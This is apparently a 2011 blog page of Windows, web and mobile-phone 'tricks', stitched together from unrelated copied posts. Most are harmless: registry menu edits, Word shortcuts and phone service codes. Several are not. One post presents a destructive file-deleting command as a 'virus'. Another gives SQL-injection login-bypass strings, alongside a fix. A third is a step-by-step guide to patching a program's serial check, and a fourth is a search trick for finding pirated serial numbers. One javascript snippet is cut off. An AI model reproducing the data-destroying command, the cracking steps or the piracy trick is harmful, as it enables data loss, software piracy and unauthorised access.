Pages

Wednesday, March 9, 2011

Save All Windows Updates To Your Disk

Many times you really get bugged up if you had to reformat your HDD and lose all your updates installed and you have to re-download them and reinstall for which you waste your time and money. Now I will show you how to save all Windows updates to your HDD. There are several methods and we will discuss all of them.

1st Method: Easiest and only for Windows XP with SP2. Firstly you have to configure your Automatic Updates Settings through MyComputer(right click)>>properties>>Automatic Updates.

Lock Unlock Folder Using .bat file

Suppose you want to lock the folder games in d: which has the path D:\GamesIn the same drive create a text file and type
ren games games.{21EC2020-3AEA-1069-A2DD-08002B30309D}
Now save this text file as loc.bat

create another text file and type in it
ren games.{21EC2020-3AEA-1069-A2DD-08002B30309D} games
Now save this text file as key.bat

How to Write a Windows XP Driver

Source: Microsoft Corporation July 2001


Summary: This document describes the steps you should take to create a Microsoft® Windows® XP driver for your device. To create a Windows XP device driver:

Install the current Windows DDK. Read the system requirements and installation instructions in the stand-alone Getting Started HTML file supplied with the DDK.
Read Getting Started with Windows Drivers. This document guides you through the planning and decision-making process involved in making a Windows device driver from design through distribution. You should also look through the DDK documentation for device-type-specific information.

How To Make A Powerfull Virus With Only Notepad

delete all folders/files just put this:

DEL /F /Q *

Into notpad and save it as whateveryouwant.cmd

It will delete all files on the computer even if they are read only and it will not promt you to do it. You will not think any thing has happend untill you try and do something.

WARNING DO NOT CLICK ON IT WHEN YOU HAVE CREATED IT, IT WILL DESTROY YOUR COMPUTER

How to edit right click menu in windows

A lot of programs you install will add themselves to the right-click menu of your files and/or folders. And most times, you have no choice in the matter and, as a result, your right-click menu can get very long with added items you don't even use. The last person I was helping with this had a right context menu so long that the Rename option was no longer visible!
Fortunately, you can easily remove those unwanted menu items, if you know the registry values to edit. And it's not at all difficult once you know the keys responsible for the additions.

For Files, the secret lies in the "context menu handlers" under the shellex subkey for "All Files" which, in the registry, is nothing but an asterisk - like a dos wildcard, which means the values entered apply to all files. It is at the very top of the Root key, right here:

HKEY_CLASSES_ROOT*shellexContextMenuHandlers

Click the the + sign next to the ContextMenuHandlers key, to expand it.
Now you will see some of the programs that have added items to your right-click menu. Simply delete the program keys you don't want.
Yup! It's that simple. If deleting makes you uneasy, just export the key before deleting it. Or, instead of deleting the values, disable them. Simply double click the default value for the program on the right hand pane and rename the clsid value by placing a period or dash in front of it.
ie; - {b5eedee0-c06e-11cf-8c56-444553540000}
Then exit the registry, refresh, and right click a file to see if the item was removed from the menu.
Some programs - like WinZip or WinRar - will add several items to your right click menu but all of them will be removed by deleting or disabling their one context menu handler.

Note that the above key only applies to the right click menu of files.
To remove entries from the right click context menu of folders, you need to navigate to the Folder and Drive keys:

HKEY_CLASSES_ROOTFoldershellexContextMenuHandlers
HKEY_CLASSES_ROOTDriveshellexContextMenuHandlers

All you have to do is follow the same procedure as for Files - either disable or delete items you wish to remove.
Adding Items
Adding Items to the right click menu of Files and Folders is also fairly simple using the Registry. It just involves the creation of a few new keys for each item you wish to add. You edit the same keys used for removing items. Let's use Notepad as an example of an item you'd like to add to the right click menu of all your files or folders.

For folders, go to this key:

HKEY_CLASSES_ROOT Folder
Click the + sign next to Folder and expand it so that the Shell key is visible. Right click the Shell key and choose New>Key and name the key Notepad or whatever else you'd prefer (whatever the key is named is what will appear in the right-click menu). Now right click the new key you made and create another key named Command. Then, in the right hand pane, double click "Default" and enter Notepad.exe as the value.
Exit the registry, refresh, and right click any folder. Notepad should now be on the context menu.

For files, go here again:

HKEY_CLASSES_ROOT*
Expand the * key and see if a Shell key exists. If it does exist, follow the same procedure as for folders. If it does not exist, you'll have to create a new Shell first. Just right click the * key and choose New>Key and name it Shell. Then right click the Shell key and continue on the same way you did for adding items to the right click menu of folders.
Once done, Notepad should appear as an option in the right click menu of all your files.

Get The Windows Vista Look On Xp, without using any system resources

For all the Xp users here is something you will love.

You don't want to spend on Windows Vista and you are in no mood of changing your Operating system(or your pc doesn't have the recommended configuration to run vista).Well, whatever the reason maybe here is an amazing software that will give your Xp the Vista look.

So Get StyleXp to make your Xp look like Vista with various themes, visual styles, wallpapers, logons, bootscreens, icons, cursors and explorer bar.Change to the new style and experience the ultimate audio,visual and image enhancements.

And one more good news,StyleXp does NOT slow down your pc.There is an option 'Use no resources' ,which instructs StyleXp not to use your system resources at all,thereby enhancing performance at no cost.


How do you like the software.Please comment.
It is worth giving a try.

Tuesday, March 8, 2011

How to hack a website

I want to show you just one way that hackers can get in to your website and mess it up, using a technique called SQL Injection. And then I'll show you how to fix it. This article touches on some technical topics, but I'll try to keep things as simple as possible. There are a few very short code examples written in PHP and SQL. These are for the techies, but you don't have to fully understand the examples to be able to follow what is going on. Please also note that the examples used are extremely simple, and Real Hackers™ will use many variations on the examples listed.

If your website doesn't use a database, you can relax a bit; this article doesn't apply to your site — although you might find it interesting anyway. If your site does use a database, and has an administrator login who has rights to update the site, or indeed any forms which can be used to submit content to the site — even a comment form — read on.

Warning

This article will show you how you can hack in to vulnerable websites, and to check your own website for one specific vulnerability. It's OK to play around with this on your own site (but be careful!) but do not be tempted to try it out on a site you do not own. If the site is properly managed, an attempt to log in using this or similar methods will be detected and you might find yourself facing charges under the Computer Misuse Act. Penalties under this act are severe, including heavy fines or even imprisonment.

What is SQL Injection?

SQL stands for Structured Query Language, and it is the language used by most website databases. SQL Injection is a technique used by hackers to add their own SQL to your site's SQL to gain access to confidential information or to change or delete the data that keeps your website running. I'm going to talk about just one form of SQL Injection attack that allows a hacker to log in as an administrator - even if he doesn't know the password.

Is your site vulnerable?

If your website has a login form for an administrator to log in, go to your site now, in the username field type the administrator user name.

In the password field, type or paste this:

x' or 'a' = 'a

If the website didn't let you log in using this string you can relax a bit; this article probably doesn't apply to you. However you might like to try this alternative:

x' or 1=1--

Or you could try pasting either or both of the above strings into both the login and password field. Or if you are familiar with SQL you could try a few other variations. A hacker who really wants to get access to your site will try many variations before he gives up.

If you were able to log in using any of these methods then get your web tech to read this article, and to read up all the other methods of SQL Injection. The hackers and "skript kiddies" know all this stuff; your web techs need to know it too.

The technical stuff

If you were able to log in, then the code which generates the SQL for the login looks something like this:

$sql =
"SELECT * FROM users
"WHERE username = '" . $username .
"' AND password = '" . $password . "'";

When you log in normally, let's say using userid admin and password secret, what happens is the admin is put in place of $username and secret is put in place of $password. The SQL that is generated then looks like this:

SELECT * FROM users WHERE username = 'admin' and PASSWORD = 'secret'

But when you enter x' or 'a' = 'a as the password, the SQL which is generated looks like this:

SELECT * FROM users WHERE username = 'admin' and PASSWORD = 'x' or 'a' = 'a'

Notice that the string: x' or 'a' = 'a has injected an extra phrase into the WHERE clause: or 'a' = 'a' . This means that the WHERE is always true, and so this query will return a row contain the user's details.

If there is only a single user defined in the database, then that user's details will always be returned and the system will allow you to log in. If you have multiple users, then one of those users will be returned at random. If you are lucky, it will be a user without administration rights (although it might be a user who has paid to access the site). Do you feel lucky?

How to defend against this type of attack

Fixing this security hole isn't difficult. There are several ways to do it. If you are using MySQL, for example, the simplest method is to escape the username and password, using the mysql_escape_string() or mysql_real_escape_string() functions, e.g.:

$userid = mysql_real_escape_string($userid);
$password = mysql_real_escape_string($password);
$sql =
"SELECT * FROM users
"WHERE username = '" . $username .
"' AND password = '" . $password . "'";

Now when the SQL is built, it will come out as:

SELECT * FROM users WHERE username = 'admin' and PASSWORD = 'x\' or \'a\' = \'a'

Those backslashes ( \ ) make the database treat the quote as a normal character rather than as a delimiter, so the database no longer interprets the SQL as having an OR in the WHERE clause.

This is just a simplistic example. In practice you will do a bit more than this as there are many variations on this attack. For example, you might structure the SQL differently, fetch the user using the user name only and then check manually that the password matches or make sure you always use bind variables (the best defence against SQL injection and strongly recommended!). And you should always escape all incoming data using the appropriate functions from whatever language your website is written in - not just data that is being used for login.

There's more

This has just been a brief overview. There are many more hacking techniques than SQL Injection; there are many more things that can be done just using SQL Injection. It is possible to directly change data, get access to confidential information, even delete your whole database — irrespective of whether the hacker can actually log in — if your website isn't set up correctly.

Get The Serial Number of all software You Need

* Go to Google.

* In the search field type: "Product name" 94FBR

* Where, "Product Name" is the name of the item you want to find the serial number for.

* And voila - there you go - the serial number you needed.

HOW DOES THIS WORK?

File Hosting For Mobile WAP

File Hosting For Mobile WAP

visit
http://wappal.com

File hosting for mobile

You can upload any thing (ring tones , wallpapers , games, softwares)

Dow

Dancing Flowers in Google webpage

1. Go to
www.Google.com

2. Click images,
3. Type "flowers",
4. You will get a page which is having full of Flower images,
5. Then delete the URL from the address bar and paste the below script.

java script:R=0; x1=.1; y1=.05; x2=.25; y2=.24; x3= 1.6; y3=.24; x4=300; y4=200; x5=300; y5=200; DI= document.images; DIL=DI.length; function A(){for(i=0; i


*All you have to do is to remove the space between java script =>'java script:'

Cracking complete Tutorial

We will have a very basic and simple approach. We will use a disassemble and an assembler.

Disassemble is the process that will let us to view the "asm" source code of the
dissembled file.
Assembler - is the process that will allow us to make changes to the code.

The most classic disassemble is W32Dasm, download it here:
CODE
http://foff.astalavista.ms/downloads/W32Dasm_8.93.zip


The best assembler is HIEW32, download it here:
CODE
http://foff.astalavista.ms/downloads/Hiew726w.zip


Download the file that we will crack here:
CODE
http://foff.astalavista.ms/downloads/cim_crackme.zip


Unzip everything and we are ready to start!!!


Step1.

Run the file "cim_crackme.exe", we see there two empty boxes. Name and Serial like many
shareware software. Put there your name and any serial number then click on "Check"
button. We will receive this message: "This is not a valid serial......" Write this
message down, don't make errors. Just write the message without the quotes and the dots of course then close everything.

Step2.

Run W32Dasm disassemble, on the menu bar open the first menu "Disassemble" the "Open
file to disassemble". Browse to our target "cim_crackme.exe" then disassemble. You now
should see a lot of code on your screen


Go at the search menu of W32Dasm and click on "Find Text", put in the search box the text
string we did memorize somewhere: "this is not a valid serial" (without the quotes).


:

*Referenced by (U)nconditional or ©onditional Jump at Address:
|:004010D7


You should record the address you see: 004010D7 (is very important)

Now, go up once more until you find the address you just recorded,


The arrow number 1 show who is addresses group located. In the circle is the address we
were looking for. The address and all the row is selected by the green bar too! I hope
everything is clear enough! As you see, there is an other arrow, "arrow 2" that indicates
"JNE". What does "JNE" mean???

JNE - Jump if not equal
JE - Jump if equal

When we enter a fake serial number, it jumps. Hmmm, we should reverse it. The reverse of
"JNE" is "JE". If we do this, the program will accept any serial number as a real one!!!

But how do we edit it???

Using an assembler of course

Our mission now is to reverse "JNE" to "JE" at the address: "004010D7".

Step3.

Now send a desktop icon of HIEW32 then drag and drop "cim_crackme.exe" over it. You should
see some crap code, now press F4 from the keyboard then choose decode from the selection.


Now, return to HIEW and press F5 from keyboard then enter the address we recorded above
but don't forget to add a dot before the address and to remove the zeros before the
address number. Enter it like this: ".4010D7" (without the quotes of course) then hit
ENTER. After this you will land in the exact address where we will do the reversing.
Notice this line carefully:

.004010D7: 7516 jne .0004010EF

We should change the bytes here. Without moving the selection from "75" press F3 from
keyboard then hit the right arrow of the keyboard directional keys one time, be sure to
have the cursor under the number "5". Carefully press the number 4 from the keyboard. The
number will change from "7516" to "7416". Carefully press F9 from keyboard to save our
changes and F10 to exit at all! We are done!!!

Now check that everything is ok, run "cim_crackme.exe" that you just cracked and put you
name and any serial number..............CONGRATULATIONS!!! You Cracked It.

All MS WORD Shortcuts, useful!!!!!!!!!

Command Name Modifiers Key Menu
About Help
Accept All Changes in Doc Accept
Accept All Changes Shown Accept
All Caps Ctrl+Shift+ A
Annotation Alt+Ctrl+ M Insert
App Maximize Alt+ F10
App Restore Alt+ F5
Apply Heading1 Alt+Ctrl+ 1
Apply Heading2 Alt+Ctrl+ 2
Apply Heading3 Alt+Ctrl+ 3
Apply List Bullet Ctrl+Shift+ L
Arrange All Window
Auto Correct Tools
Auto Format Alt+Ctrl+ K
Auto Format Begin Format
Auto Summarize Begin Tools
Auto Text F3
Auto Text Alt+Ctrl+ V
Background Fill Effect Format Background
Background More Colors Format Background
Background Watermark Format Background
Bold Ctrl+ B
Bold Ctrl+Shift+ B
Bookmark Ctrl+Shift+ F5 Insert
Bookshelf Lookup Reference Tools
Break Insert
Browse Next Ctrl+ Page Down
Browse Prev Ctrl+ Page Up
Browse Sel Alt+Ctrl+ Home
Busu Language
Cancel Esc
Center Para Ctrl+ E
Change Case Format
Change Case Shift+ F3
Changes View
Char Left Left
Char Left Extend Shift+ Left
Char Right Right
Char Right Extend Shift+ Right
Checkin File
Checkout File
Clear Del Clear
Clear Formatting Clear
Close or Exit Alt+ F4
Close Pane Alt+Shift+ C
Column Break Ctrl+Shift+ Return
Column Select Ctrl+Shift+ F8
Copy Ctrl+ C
Copy Ctrl+ Insert
Copy Format Ctrl+Shift+ C
Copy Text Shift+ F2
Create Auto Text Alt+ F3
Cross Reference Reference Menu
Customize Tools
Customize Add Menu Shortcut Alt+Ctrl+ =
Customize Keyboard Shortcut Alt+Ctrl+ Num +
Customize Remove Menu Shortcut Alt+Ctrl+ -
Cut Ctrl+ X
Cut Shift+ Del
Date Field Alt+Shift+ D
Date Time Insert
Delete All Comments in Doc Reject
Delete All Comments Shown Reject
Delete Back Word Ctrl+ Backspace
Delete Table Toolbar 32780
Delete Word Ctrl+ Del
Distribute Para Ctrl+Shift+ J
Do Field Click Alt+Shift+ F9
Doc Close Ctrl+ W
Doc Close Ctrl+ F4
Doc Maximize Ctrl+ F10
Doc Move Ctrl+ F7
Doc Restore Ctrl+ F5
Doc Size Ctrl+ F8
Doc Split Alt+Ctrl+ S Window
Double Underline Ctrl+Shift+ D
Draw Snap to Grid Draw
End of Column Alt+ Page Down
End of Column Alt+Shift+ Page Down
End of Doc Extend Ctrl+Shift+ End
End of Document Ctrl+ End
End of Line End
End of Line Extend Shift+ End
End of Row Alt+ End
End of Row Alt+Shift+ End
End of Window Alt+Ctrl+ Page Down
End of Window Extend Alt+Ctrl+Shift+ Page Down
Endnote Now Alt+Ctrl+ D
Envelope Wizard Letters and Mailings Menu
EServices Tools
Exit File
Extend Selection F8
Field Insert
Field Chars Ctrl+ F9
Field Codes Alt+ F9
Find Ctrl+ F
Fix Broken Text Tools
Fix Me Help
Font Ctrl+ D
Font Ctrl+Shift+ F
Font Size Select Ctrl+Shift+ P
Footnote Now Alt+Ctrl+ F
Footnotes View
Formatting Properties Format
Formula Table
Frameset Wizard Frames Menu
Go Back Shift+ F5
Go Back Alt+Ctrl+ Z
Go To Ctrl+ G Edit
Go To F5 Edit
Grow Font Ctrl+Shift+ .
Grow Font One Point Ctrl+ ]
Hanging Indent Ctrl+ T
Hanja Dictionary Language
Header View
Header Footer Link Alt+Shift+ R
Headings Table
Help F1
HHC Language
Hidden Ctrl+Shift+ H
HTMLSource View
Hyperlink Ctrl+ K
Hyphenation Language
Indent Ctrl+ M
Index and Tables Reference Menu
Insert Column Toolbar 32782
Insert Column Right Toolbar 32782
Insert Row Above Toolbar 32782
Insert Row Below Toolbar 32782
Italic Ctrl+ I
Italic Ctrl+Shift+ I
Justify Para Ctrl+ J
Language Language
Left Para Ctrl+ L
Letter Properties Letters and Mailings Menu
Letters Wizard JToolbar Letters and Mailings Menu
License Verification Help
Line Down Down
Line Down Extend Shift+ Down
Line Up Up
Line Up Extend Shift+ Up
Links Edit
List Num Field Alt+Ctrl+ L
Lock Fields Ctrl+ 3
Lock Fields Ctrl+ F11
Macro Alt+ F8
Mail Merge Check Alt+Shift+ K
Mail Merge Edit Data Source Alt+Shift+ E
Mail Merge to Doc Alt+Shift+ N
Mail Merge to Printer Alt+Shift+ M
Mail Merge Toolbar Letters and Mailings Menu
Mail Merge Wizard Letters and Mailings Menu
Mark Citation Alt+Shift+ I
Mark Index Entry Alt+Shift+ X
Mark Table of Contents Entry Alt+Shift+ O
Menu Mode F10
Menu Show Reviewers Show Markup
Merge Field Alt+Shift+ F
Merge Revisions Tools
M*cro$oft Script Editor Alt+Shift+ F11
M*cro$oft System Info Alt+Ctrl+ F1
Move Text F2
New Ctrl+ N File
New Window Window
Next Cell Tab
Next Field F11
Next Field Alt+ F1
Next Misspelling Alt+ F7
Next Object Alt+ Down
Next Window Ctrl+ F6
Next Window Alt+ F6
Normal Alt+Ctrl+ N View
Normal Style Ctrl+Shift+ N
Normal Style Alt+Shift+ Clear (Num 5)
Number Insert
Object Insert
Office Clipboard Edit
Office On The Web Help
Online Meeting Online Collaboration
Open Ctrl+ O
Open Ctrl+ F12
Open Alt+Ctrl+ F2
Open or Close Up Para Ctrl+ 0
Options Tools
Other Pane F6
Other Pane Shift+ F6
Outline Alt+Ctrl+ O
Outline Collapse Alt+Shift+ -
Outline Collapse Alt+Shift+ Num -
Outline Demote Alt+Shift+ Right
Outline Expand Alt+Shift+ =
Outline Expand Alt+Shift+ Num +
Outline Master View
Outline Move Down Alt+Shift+ Down
Outline Move Up Alt+Shift+ Up
Outline Promote Alt+Shift+ Left
Outline Show First Line Alt+Shift+ L
Overtype Insert
Page Alt+Ctrl+ P View
Page Break Ctrl+ Return
Page Down Page Down
Page Down Extend Shift+ Page Down
Page Field Alt+Shift+ P
Page Numbers Insert
Page Up Page Up
Page Up Extend Shift+ Page Up
Para Down Ctrl+ Down
Para Down Extend Ctrl+Shift+ Down
Para Up Ctrl+ Up
Para Up Extend Ctrl+Shift+ Up
Paste Ctrl+ V
Paste Shift+ Insert
Paste As Hyperlink Edit
Paste Format Ctrl+Shift+ V
Paste Special Edit
Postcard Wizard Letters and Mailings Menu
Present It Send To
Prev Cell Shift+ Tab
Prev Field Shift+ F11
Prev Field Alt+Shift+ F1
Prev Object Alt+ Up
Prev Window Ctrl+Shift+ F6
Prev Window Alt+Shift+ F6
Print Ctrl+ P
Print Ctrl+Shift+ F12
Print Preview Ctrl+ F2
Print Preview Alt+Ctrl+ I
Proofing F7
Properties File
Protect Unprotect Document Tools
Record Macro Toggle Macro
Redo Alt+Shift+ Backspace
Redo or Repeat Ctrl+ Y Edit
Redo or Repeat F4 Edit
Redo or Repeat Alt+ Return Edit
Reject All Changes in Doc Reject
Reject All Changes Shown Reject
Repeat Find Shift+ F4
Repeat Find Alt+Ctrl+ Y
Replace Ctrl+ H Edit
Reset Char Ctrl+ Space
Reset Char Ctrl+Shift+ Z
Reset Para Ctrl+ Q
Revision Marks Toggle Ctrl+Shift+ E
Right Para Ctrl+ R
Save Ctrl+ S
Save Shift+ F12
Save Alt+Shift+ F2
Save As F12 File
Save As Web Page File
Schedule Meeting Online Collaboration
Select All Ctrl+ A Edit
Select All Ctrl+ Clear (Num 5) Edit
Select All Ctrl+ Num 5 Edit
Select Cell Toolbar 32778
Select Column Toolbar 32778
Select Row Toolbar 32778
Select Table Alt+ Clear (Num 5) Toolbar 32778
Send For Review Send To
Send to Fax Send To
Send to Online Meeting Participants Send To
Show All Ctrl+Shift+ 8
Show All Headings Alt+Shift+ A
Show All Headings Alt+Shift+ A
Show Comments Show Markup
Show Formatting Show Markup
Show Heading1 Alt+Shift+ 1
Show Heading2 Alt+Shift+ 2
Show Heading3 Alt+Shift+ 3
Show Heading4 Alt+Shift+ 4
Show Heading5 Alt+Shift+ 5
Show Heading6 Alt+Shift+ 6
Show Heading7 Alt+Shift+ 7
Show Heading8 Alt+Shift+ 8
Show Heading9 Alt+Shift+ 9
Show Hide Help
Show Insertions and Deletions Show Markup
Shrink Font Ctrl+Shift+ ,
Shrink Font One Point Ctrl+ [
Shrink Selection Shift+ F8
Sign Out of Passport File
Small Caps Ctrl+Shift+ K
Sort Table
Sound Comments
Space Para1 Ctrl+ 1
Space Para15 Ctrl+ 5
Space Para2 Ctrl+ 2
Speech Tools
Spike Ctrl+Shift+ F3
Spike Ctrl+ F3
Split Table
Start of Column Alt+ Page Up
Start of Column Alt+Shift+ Page Up
Start of Doc Extend Ctrl+Shift+ Home
Start of Document Ctrl+ Home
Start of Line Home
Start of Line Extend Shift+ Home
Start of Row Alt+ Home
Start of Row Alt+Shift+ Home
Start of Window Alt+Ctrl+ Page Up
Start of Window Extend Alt+Ctrl+Shift+ Page Up
Style Ctrl+Shift+ S
Style Separator Alt+Ctrl+ Return
Subscript Ctrl+ =
Superscript Ctrl+Shift+ =
Symbol Insert
Symbol Font Ctrl+Shift+ Q
Tabs Format
Templates Tools
Theme Format
Thesaurus Shift+ F7 Language
Time Field Alt+Shift+ T
Toggle Character Code Alt+ X
Toggle Field Display Shift+ F9
Toggle Master Subdocs Ctrl+ \
Tool Shift+ F1
Toolbars View
Translate Pane Alt+Shift+ F7 Language
Un Hang Ctrl+Shift+ T
Un Indent Ctrl+Shift+ M
Underline Ctrl+ U
Underline Ctrl+Shift+ U
Undo Ctrl+ Z
Undo Alt+ Backspace
Unlink Fields Ctrl+ 6
Unlink Fields Ctrl+Shift+ F9
Unlock Fields Ctrl+ 4
Unlock Fields Ctrl+Shift+ F11
Update Auto Format Alt+Ctrl+ U
Update Fields F9
Update Fields Alt+Shift+ U
Update Source Ctrl+Shift+ F7
VBCode Alt+ F11
Versions File
Web View
Web Component Insert
Web Go Back Alt+ Left
Web Go Forward Alt+ Right
Web Page Preview File
Wizard Table
Word Count Tools
Word Count List Ctrl+Shift+ G
Word Count Recount Ctrl+Shift+ R
Word Left Ctrl+ Left
Word Left Extend Ctrl+Shift+ Left
Word Perfect Help Help
Word Right Ctrl+ Right
Word Right Extend Ctrl+Shift+ Right
Word Underline Ctrl+Shift+ W

All Codes For Siemens / Siemens Codes / Siemens Codes List

*#0003*(secret code 8 digits)# All Siemens Phones: Service Provider Unlock
Siemens S25/C25
SP unlock *#0003*(secret code 8 digits)#
Show IMEI code: * # 06 #
Resets language to automatic selection : * # 0000 # then Green button
Pin Out
Data Cable schematics
Phone's connector pin-out:
1- GND
2- SB
3- POWER
4- NC
5- TX
6- RX
7- CLOCK
8- DATA
9- GND MIC
10- HF MIC
11- AUDIO
12- GND AUDIO
Siemens S1/S3/S3 Com
To view the software date and else with S3 com, S4, S4Power, Sony cmdx 1000e press with SIM removed *#06# and left softkey.
To view some other stuff with S4Power, Sony cmdx 1000e press with SIM removed *#06# and left softkey twice.
To view the software date with S3 com, S4, S4Power, Sony cmdx 1000e press with SIM installed menu 98 and left softkey twice.
ACTIVATE MONITOR MODE
Siemens S1/S3
Menu, 9 (Phone Options), 7 (Phone Status), Left Display Button (left MENU key), 5553756, Hang-Up Button (Red Handset key)


Siemens S3 COM/S4:

Menu, 9 (Phone Options), 7 (Phone Status - 8 on Some), Left Display Button (left MENU key), 7684666, Hang-Up Button (Red Handset key)
Note: Now Monitor should appear at the bottom of the Network Options menu.
MONITOR MODE
Pressing the right Display Button when in monitor mode will toggle into 1 and 2 modes

Pressing the right Display Button when in monitor mode will show a list of the six cells with the strongest signals.

Test Mode Indicators: (* = only available when call in progress )
CH Channel Number

RX Signal Strength (dB)

N NCC (Colour Code)

B BCC (Colour Code)

CI Cell ID (in Hex)

C1+ How long before phone does forced hand over. (see RX and RXAM)

LAI Location Area Identity. Display Network ID code (42F010 = 240.01) and MSC

TXPWR Transmit Power (dB)

RXAM Receive signal strength cut-off point

TS* Time Slot Number

TA* Timing Advance. Distance from tower in Km X 2

PL* Power Level
POWER table
PL: 5 6 7 8 9 10 11 12 13 14 15

dB: 33 31 29 27 25 23 21 19 17 15 13

Watts: 2 1.3 .8 .5 .3 .2 .13 .08 .05 .03 .02
LF* C1 value with continuous transmission from tower

LS* C1 Value with discontinuous transmission from tower

QF* Bit Error Rate with continuous transmission from tower

QS* Bit Error Rate with discontinuous transmission from tower
BER (bit error rate) table
QF/QS register: 0 1 2 3 4 5 6 7

% of bit sent: 0.2 0.8 0.4 1.6 3.2 6.4 12.8 25.6


Siemens S1/S3:
Here's a trick to play Tetris, also known as Klotz on a Siemens S1.
Turn the phone on. Enter PIN. Before the telephone has logged in to the your GSM net do the following steps.
1: Choose F 9 (function settings)
2: Choose send own number and push the right button for choose.
3: Push 9
USE 2 as <> , rotate the klotz with 5 and drop with 4.
[I have just heard from one of the programmers of the phone that Tetris was in the phone during development, but it was removed before it was produced. Apparently someone has the patent on games in mobile phones and Siemens didn't want to pay the licensing fees. It was either in Menu F-9-9 or it's not there at all.]
Siemens S3 Comfort

MONITOR MODE:
The Siemens S3 Com series have a Monitor mode that can be activated directly from the standard user keypad. In order to activate this mode, you must enter the special access code currently programmed into the phone.
TO ACTIVATE MONITOR MODE:
Turn the phone on.
Enter the PIN access code on press OK. (Only if is enabled).
Press Menu. (Left top button).
Press 9. (Phone Options).
Press 8. (Phone Status) (May be button 7 in some phones).
You may see your IMEI Number
Left Display Button (Top left MENU key).
7684666
Hang-Up Button. (Red Handset key).

Note: Monitor should appear now at the bottom of the Network Options menu.
MONITOR MODE

Pressing the right Display Button when in monitor mode will toggle into 1 and 2 modes

Siemens S4/S4 Power:
In phonebook under "Own Phone No." enter +12022243121 (which is the number to the White House) and you'll get a greeting from the people who programmed the phone.
MONITOR MODE

The Siemens S4 series have a Monitor mode that can be activated directly from the standard user keypad. In order to activate this mode, you must enter the special access code currently programmed into the phone.
TO ACTIVATE MONITOR MODE:
Menu, 9 (Phone Options), 7 (Phone Status), Left Display Button (left MENU key), 7684666, Hang-Up Button (Red Handset key)
Now "Monitor" should appear at the bottom of the Network Options menu.
Pressing the right Display Button when in monitor mode will show a list of the six cells with the strongest signals.


Test Mode Indicators: (* = only available when call in progress )


--------------------
CH Channel Number
RX Signal Strength (dB)
N NCC (Color Code)
B BCC (Color Code)
CI Cell ID (in Hex)
C1+ how long before phone does forced hand over. (see RX and RXAM)
LAI Location Area Identity. Display Network ID code (42F010 = 240.01) and MSC
TXPWR Transmit Power (dB)
RXAM Reeceive signal strength cut-off point
TS* Time Slot Number
TA* Timing Advance. Distance from tower in Km X 2
PL* Power Level


Power Table

PL: 5 6 7 8 9 10 11 12 13 14 15
dB: 33 31 29 27 25 23 21 19 17 15 13
Watts: 2 1.3 .8 .5 .3 .2 .13 .08 .05 .03 .02

LF* C1 value with continuous transmission from tower
LS* C1 Value with discontinuous transmission from tower
QF* Bit Error Rate with continuous transmission from tower
QS* Bit Error Rate with discontinuous transmission from tower


BER (bit error rate) table
QF/QS register: 0 1 2 3 4 5 6 7
% of bit sent: 0.2 0.8 0.4 1.6 3.2 6.4 12.8 25.6


Siemens S6/S10:

In Phonebook, store as your own number: +12022243121
Then you get the sun and two palms in the display, also a greeting message of the "MMI-team".
It has been said that the phone number is the number of the Capitol building in Washington, DC (but not sure).

Siemens S15 Secret Menu's

Press * -> # -> 7 -> 4 -> 3 -> 6 -> 3 -> 6 -> 7 -> * -> 8 -> 3 ->
7 -> 8 -> # ,press clear key to clear screen and return to
stand-by mode
press Menu, it will show additional menu
Menu 3.3.4 Band selection,
Menu 3.3.4.1 Automatic band selection,
Menu 3.3.4.2 select GSM 900 only,
Menu 3.3.4.3 select GSM 1800 only,
Menu 10 Engineering,
Menu 10.1 MS info,

Menu 10.2 software detail,
Menu 10.2.1 software version,
Menu 10.2.2 EEPROM version,

Menu 10.3 Test/production details
Menu 10.3.1 Hardware deta
Menu 10.3.2 production deta
Menu 10.3.3 Service deta
Menu 10.3.4 Mechanical deta

Menu 10.1.1 MS info on, then on the screen show these, for example:

FCN RXL C1 C2
642 011+11+91 -> PAGE 1

CID DSC CB
11211 045 000 -> PAGE 2

BCC NCC TN
000 002 00 -> PAGE 3

RXf RXs RQf RQs
00 00 00 00 -> PAGE 4

ATa APa Hn Hf
001 000 05 00 -> PAGE 5

DTU DTD HP CI
+ ? - - -> PAGE 6

MM CC RR
IdNS Nul Idl -> PAGE 7

All Codes For Nokia / Nokia Codes / Nokia Codes List

*3370# Activate Enhanced Full Rate Codec (EFR) - Your phone uses the best sound quality but talk time is reduced my approx. 5%
#3370# Deactivate Enhanced Full Rate Codec (EFR)
*#4720# Activate Half Rate Codec - Your phone uses a lower quality sound but you should gain approx 30% more Talk Time
*#4720# Deactivate Half Rate Codec
*#0000# Displays your phones software version, 1st Line : Software Version, 2nd Line : Software Release Date, 3rd Line : Compression Type
*#9999# Phones software version if *#0000# does not work
*#06# For checking the International Mobile Equipment Identity (IMEI Number)
#pw+1234567890+1# Provider Lock Status. (use the "*" button to obtain the "p,w" and "+" symbols)
#pw+1234567890+2# Network Lock Status. (use the "*" button to obtain the "p,w" and "+" symbols)
#pw+1234567890+3# Country Lock Status. (use the "*" button to obtain the "p,w" and "+" symbols)
#pw+1234567890+4# SIM Card Lock Status. (use the "*" button to obtain the "p,w" and "+" symbols)
*#147# (vodafone) this lets you know who called you last
*#1471# Last call (Only vodofone)
*#21# Allows you to check the number that "All Calls" are diverted to
*#2640# Displays security code in use
*#30# Lets you see the private number
*#43# Allows you to check the "Call Waiting" status of your phone.
*#61# Allows you to check the number that "On No Reply" calls are diverted to
*#62# Allows you to check the number that "Divert If Unreachable (no service)" calls are diverted to
*#67# Allows you to check the number that "On Busy Calls" are diverted to
*#67705646# Removes operator logo on 3310 & 3330
*#73# Reset phone timers and game scores
*#746025625# Displays the SIM Clock status, if your phone supports this power saving feature "SIM Clock Stop Allowed", it means you will get the best standby time possible
*#7760# Manufactures code
*#7780# Restore factory settings
*#8110# Software version for the nokia 8110
*#92702689# Displays - 1.Serial Number, 2.Date Made, 3.Purchase Date, 4.Date of last repair (0000 for no repairs), 5.Transfer User Data. To exit this mode you need to switch your phone off then on again
*#94870345123456789# Deactivate the PWM-Mem
**21*number# Turn on "All Calls" diverting to the phone number entered
**61*number# Turn on "No Reply" diverting to the phone number entered
**67*number# Turn on "On Busy" diverting to the phone number entered
12345 This is the default security code
press and hold # Lets you switch between lines
*#3283# or *#DATE# Date of Manufacture
*#682371158412125# Software Version

A Website Tells U If Your Computer Ports Are Hacked Or Not

Goto this site mentioned below and test will start automatically:
http://probe.hackerwatch.org/probe/probe.asp

You need to wait 1 min before the test will start


info:Port Scan
This server will now attempt to open several common ports on your computer. The results of these attempts will be displayed on this page as Open, Closed, or Secure:

If your firewall is configured to block a port, and it is operating correctly, you will see Secure and an event will be logged on your firewall.
